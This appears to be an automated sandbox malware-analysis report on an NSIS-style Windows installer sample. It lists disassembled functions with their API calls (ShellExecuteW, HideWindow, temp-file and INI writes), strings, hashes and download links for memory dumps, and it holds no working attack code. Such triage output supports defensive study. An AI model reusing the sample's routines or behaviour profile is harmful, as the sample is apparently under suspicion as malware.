Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(007CF630), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
ComingJanuaryRefrigerator, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$ComingJanuaryRefrigerator$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-179551314
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
